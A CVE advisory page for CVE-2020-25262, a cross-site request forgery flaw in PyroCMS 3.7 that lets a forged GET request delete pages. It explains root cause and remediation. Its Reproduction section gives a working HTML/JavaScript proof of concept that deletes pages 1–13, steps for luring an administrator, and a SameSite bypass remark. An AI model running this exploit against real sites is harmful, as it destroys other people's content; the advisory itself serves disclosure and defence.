CVE-2020-25262
Description
PyroCMS 3.7 is vulnerable to cross-site request forgery (CSRF) via the admin/pages/delete/ URI: pages will be deleted.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Affected packages
Versions sourced from the GitHub Security Advisory.
| Package | Affected versions | Patched versions |
|---|---|---|
| pyrocms/pyrocms (Packagist) | <= 3.7 | — |
Affected products
- PyroCMS/PyroCMS
Patches
Vulnerability mechanics
Root cause
"The delete action is performed via a GET request with no CSRF token validation, allowing an attacker to forge requests that delete pages on behalf of an authenticated victim."
Attack vector
An attacker hosts a malicious HTML page containing JavaScript that sends GET requests to the PyroCMS admin/pages/delete/ URI [ref_id=1]. When an authenticated administrator visits the attacker's page, the script iterates through page IDs (e.g., 1 through 13) and issues XMLHttpRequest calls to delete each page [ref_id=1]. Because the delete action is triggered by a plain GET and lacks CSRF protection [CWE-352], the browser attaches the victim's session cookie to each forged request (provided the cookie's SameSite attribute allows cross-site sending), and the server cannot distinguish them from requests the administrator made deliberately.
Affected code
The advisory [ref_id=1] identifies the vulnerable endpoint as the admin/pages/delete/ URI. The researcher's PoC demonstrates that the delete action is triggered via a GET request to URLs of the form http://test.com/admin/pages/delete/{id}. No specific source file or function is named in the bundle.
What the fix does
No patch is published in the bundle. The advisory [ref_id=1] identifies the root cause as the delete action being performed via a GET request without CSRF tokens. Remediation has two parts: perform destructive actions only through POST (or DELETE), never GET, and validate a session-bound CSRF token on every state-changing request. Changing the HTTP method alone is not sufficient, since a cross-site form can submit a POST; the token, which a foreign origin cannot read or guess, is what stops the forged request.
Preconditions
- auth: The victim must be authenticated to the PyroCMS application with a valid session.
- input: The victim must visit a malicious page controlled by the attacker (e.g., via social engineering).
- input: The attacker must know or guess valid page IDs to delete (the PoC uses IDs 1 through 13).
Reproduction
1. Create an HTML file with the following content (adjust the base URL to match the target PyroCMS instance):

```html
<!DOCTYPE html>
<html>
<head>
<title></title>
<script type="text/javascript">
  // Researcher's PoC [ref_id=1]: one GET per page ID, fired from the attacker's origin.
  var url = "http://test.com/admin/pages/delete/";
  for (var i = 1; i <= 13; i++) {
    var url1 = url + i;
    var xhr = new XMLHttpRequest();
    xhr.open('GET', url1, true);
    // Added here: a cross-origin XMLHttpRequest sends cookies only when
    // withCredentials is set. The response stays unreadable, which does not
    // matter, because the GET itself performs the deletion.
    xhr.withCredentials = true;
    xhr.send();
  }
</script>
</head>
<body></body>
</html>
```

2. Host the file on an attacker-controlled server.
3. Send the link to an authenticated PyroCMS administrator.
4. When the victim visits the page, pages with IDs 1 through 13 are deleted without their knowledge or consent [ref_id=1]. The forged requests carry the session cookie only if its SameSite attribute permits cross-site sending: under SameSite=Lax, cross-site XMLHttpRequest and subresource loads omit the cookie, whereas top-level GET navigations (a link or window.open to the delete URI) still include it, so a GET-based delete remains forgeable through navigation even where the XMLHttpRequest variant is blocked.
Generated on May 27, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References
- github.com/advisories/GHSA-56xx-pv88-2662 (GitHub Security Advisory)
- nvd.nist.gov/vuln/detail/CVE-2020-25262 (NVD advisory)
- gist.github.com/farid007/2af454d909fa5a60a07e4e547e99964e (researcher's PoC, x_refsource_MISC)
- pyrocms.com (MITRE, x_refsource_MISC)
News mentions
No linked articles in our index yet.